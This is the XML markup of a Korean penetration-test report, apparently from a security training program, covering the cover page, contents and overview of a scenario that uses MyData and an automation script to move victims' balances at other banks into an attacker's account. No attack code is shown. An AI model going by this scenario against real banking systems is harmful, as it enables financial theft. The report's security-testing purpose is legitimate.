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3931112"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="00CF2593" w:rsidRDefault="00CF2593"/>
        <w:tbl>
          <w:tblPr>
            <w:tblpPr w:leftFromText="187" w:rightFromText="187" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="2881"/>
            <w:tblW w:w="425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80"/>
          </w:tblGrid>
          <w:tr w:rsidR="008053BE" w:rsidRPr="008053BE" w:rsidTr="008053BE">
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:b/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:alias w:val="회사"/>
                <w:id w:val="13406915"/>
                <w:placeholder>
                  <w:docPart w:val="3ADAA5B8481F41FA82EC8487E12A5C7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18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2593" w:rsidRPr="008053BE" w:rsidRDefault="008053BE">
                    <w:pPr>
                      <w:pStyle w:val="affffffffffffa"/>
                      <w:rPr>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="28"/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                      <w:t>SK</w:t>
                    </w:r>
                    <w:r w:rsidR="00CF2593" w:rsidRPr="008053BE">
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:b/>
                        <w:sz w:val="28"/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                      <w:t>쉴더스</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:b/>
                        <w:sz w:val="28"/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 루키즈</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
          <w:tr w:rsidR="008053BE" w:rsidRPr="008053BE" w:rsidTr="008053BE">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="818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b/>
                    <w:sz w:val="88"/>
                    <w:szCs w:val="88"/>
                  </w:rPr>
                  <w:alias w:val="제목"/>
                  <w:id w:val="13406919"/>
                  <w:placeholder>
                    <w:docPart w:val="438F44F242064228AB9AFCDDE9B2523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F2593" w:rsidRPr="008053BE" w:rsidRDefault="00CF2593" w:rsidP="00CF2593">
                    <w:pPr>
                      <w:pStyle w:val="affffffffffffa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8053BE">
                      <w:rPr>
                        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
                        <w:b/>
                        <w:sz w:val="88"/>
                        <w:szCs w:val="88"/>
                      </w:rPr>
                      <w:t>시나리오2</w:t>
                    </w:r>
                    <w:r w:rsidRPr="008053BE">
                      <w:rPr>
                        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                        <w:b/>
                        <w:sz w:val="88"/>
                        <w:szCs w:val="88"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> </w:t>
                    </w:r>
                    <w:r w:rsidRPr="008053BE">
                      <w:rPr>
                        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
                        <w:b/>
                        <w:sz w:val="88"/>
                        <w:szCs w:val="88"/>
                      </w:rPr>
                      <w:t>모의해킹결과보고서</w:t>
                    </w:r>
                  </w:p>
                </w:sdtContent>
              </w:sdt>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="008053BE" w:rsidRPr="008053BE" w:rsidTr="008053BE">
            <w:trPr>
              <w:trHeight w:val="242"/>
            </w:trPr>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:b/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:alias w:val="부제"/>
                <w:id w:val="13406923"/>
                <w:placeholder>
                  <w:docPart w:val="C3814B1BFA6746F096074165565D731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8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2593" w:rsidRPr="008053BE" w:rsidRDefault="00CF2593">
                    <w:pPr>
                      <w:pStyle w:val="affffffffffffa"/>
                      <w:rPr>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="008053BE">
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:b/>
                        <w:sz w:val="28"/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                      <w:t>한끗차이</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
        </w:tbl>
        <w:p w:rsidR="00CF2593" w:rsidRDefault="008053BE">
          <w:pPr>
            <w:wordWrap/>
            <w:autoSpaceDE/>
            <w:autoSpaceDN/>
            <w:snapToGrid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8659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849961</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="914400" cy="587829"/>
                    <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
                    <wp:wrapNone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5878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053BE" w:rsidRPr="008053BE" w:rsidRDefault="008053BE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8053BE">
                                  <w:rPr>
                                    <w:rFonts w:hint="eastAsia"/>
                                    <w:b/>
                                    <w:sz w:val="36"/>
                                  </w:rPr>
                                  <w:t>2024.07.</w:t>
                                </w:r>
                                <w:r w:rsidR="00C223A0">
                                  <w:rPr>
                                    <w:b/>
                                    <w:sz w:val="36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20.8pt;margin-top:618.1pt;width:1in;height:46.3pt;z-index:25188659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" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w:rsidR="008053BE" w:rsidRPr="008053BE" w:rsidRDefault="008053BE">
                          <w:pPr>
                            <w:rPr>
                              <w:b/>
                              <w:sz w:val="36"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="008053BE">
                            <w:rPr>
                              <w:rFonts w:hint="eastAsia"/>
                              <w:b/>
                              <w:sz w:val="36"/>
                            </w:rPr>
                            <w:t>2024.07.</w:t>
                          </w:r>
                          <w:r w:rsidR="00C223A0">
                            <w:rPr>
                              <w:b/>
                              <w:sz w:val="36"/>
                            </w:rPr>
                            <w:t>3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F2593">
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00EA2F96" w:rsidRDefault="00EA2F96" w:rsidP="0035144D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:sectPr w:rsidR="00EA2F96" w:rsidSect="003D0E0E">
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:headerReference w:type="first" r:id="rId10"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1985" w:right="1134" w:bottom="1134" w:left="1134" w:header="851" w:footer="992" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="272"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004257BD" w:rsidRPr="00A9506C" w:rsidRDefault="003D0E0E" w:rsidP="003D0E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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>목 차</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="003D0E0E" w:rsidP="003D0E0E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="666" w:hangingChars="100" w:hanging="240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r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \t "본문 Level 1 Title [Ctl+1],1,스타일2,1,스타일3,2" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc173402905" w:history="1">
        <w:r w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r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Pr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>개요</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">                                      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402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44D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D0E0E" w:rsidRDefault="00EF4193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402906" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>1.1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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>선정 배경</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">                   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06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3</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193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402907" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>1.2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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>주제 및 목표</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">               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07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3</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193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402908" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>1.3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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>취약점</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">                       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08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3</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193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402909" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>1.4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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>모의해킹 사용 도구</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">       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09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4</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193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402910" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>1.5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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>구성도</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">                       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10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4</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193">
      <w:pPr>
        <w:pStyle w:val="11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173402911" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>2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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>모의해킹 결과</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">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11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5</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193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402912" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>2.1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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>모의해킹 절차</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">              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12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5</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193">
      <w:pPr>
        <w:pStyle w:val="11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173402913" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>3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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>대응방안</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">      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13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18</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193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402914" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>3.1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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>코드 난독화</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">               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14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18</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193">
      <w:pPr>
        <w:pStyle w:val="2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73402915" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>3.2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Cs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>SQL인젝션</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">                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15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19</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193">
      <w:pPr>
        <w:pStyle w:val="11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173402916" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>4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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>총평</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">           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16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20</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D0E0E" w:rsidRDefault="00EF4193">
      <w:pPr>
        <w:pStyle w:val="11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173402917" w:history="1">
        <w:r w:rsidR="003D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>5.</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E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3D0E0E" w:rsidRPr="008B0D10">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>참고자료</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t xml:space="preserve">                                                                                      </w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc173402917 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001A44DC">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r w:rsidR="003D0E0E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRDefault="003D0E0E">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002A2F1E">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00643AC8" w:rsidRDefault="002A2F1E" w:rsidP="00A9506C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc173402905"/>
      <w:r w:rsidRPr="009A63AD">
        <w:lastRenderedPageBreak/>
        <w:t>개요</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="003E2410" w:rsidRPr="00643AC8" w:rsidRDefault="003E2410" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc173402906"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>선정 배경</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00C223A0" w:rsidRDefault="00080DFB" w:rsidP="00C223A0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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>마이데이터가 빠른 시간 안에 성공적으로 국민의 일상에 정착되면서 금융 이용 편의성이 증가하고</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C223A0" w:rsidRDefault="00080DFB" w:rsidP="00C223A0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</w:pP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 xml:space="preserve">그러나 편리하고 정교한 서비스를 제공받을 수 있는 동시에 개인정보 유출 위험에 노출될 수 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C223A0" w:rsidRDefault="00080DFB" w:rsidP="00C223A0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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>밖에 없다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>마이데이터 유출은</w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개인의 금융정보,</w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>건강기록,</w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>생활습관 등 프라이버시 침해</w:t>
      </w:r>
      <w:r w:rsidR="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>뿐</w:t>
      </w:r>
      <w:r w:rsidR="00122600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">만 </w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아</w:t>
      </w:r>
      <w:r w:rsidR="00122600">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>닌</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011608D" w:rsidRDefault="007E3A38" w:rsidP="00C223A0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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>금전적인 피해로 이어질 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C223A0" w:rsidRDefault="003F625D" w:rsidP="00C223A0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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이를 근거로</w:t>
      </w:r>
      <w:r w:rsidR="007E3A38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 마이데이터의 보안 강화가 필요하다고 생각하였고 마이데이터를 이용한 시나리오를</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E3A38" w:rsidRDefault="007E3A38" w:rsidP="00C223A0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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>기획했다</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015769" w:rsidRPr="0011608D" w:rsidRDefault="00015769" w:rsidP="00015769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left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00845269" w:rsidRPr="00643AC8" w:rsidRDefault="00103B7B" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc173402907"/>
      <w:r w:rsidRPr="00643AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>주제 및 목</w:t>
      </w:r>
      <w:r w:rsidR="00845269" w:rsidRPr="00643AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>표</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="0069004F" w:rsidRDefault="0011608D" w:rsidP="0069004F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left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>마이데이터를 이용한 타 은행 금전 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C223A0" w:rsidRPr="00C223A0" w:rsidRDefault="00ED0376" w:rsidP="0069004F">
      <w:pPr>
        <w:pStyle w:val="a8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left"/>
      </w:pPr>
      <w:r w:rsidRPr="0069004F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>자동화</w:t>
      </w:r>
      <w:r w:rsidR="003C2FC3" w:rsidRPr="0069004F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0069004F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">스크립트를 이용하여 피해 은행의 </w:t>
      </w:r>
      <w:r w:rsidR="003C2FC3" w:rsidRPr="0069004F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>마이데이터로</w:t>
      </w:r>
      <w:r w:rsidRPr="0069004F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 타 은행과 거래하는</w:t>
      </w:r>
      <w:r w:rsidR="003C2FC3" w:rsidRPr="0069004F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0069004F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>모든 계좌의</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED0376" w:rsidRPr="0069004F" w:rsidRDefault="00ED0376" w:rsidP="00C223A0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120"/>
        <w:ind w:left="825" w:firstLine="400"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>금</w:t>
      </w:r>
      <w:r w:rsidR="003C2FC3" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>액</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 공격자의 계좌로 송금한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00015769" w:rsidRPr="00015769" w:rsidRDefault="00015769" w:rsidP="00015769">
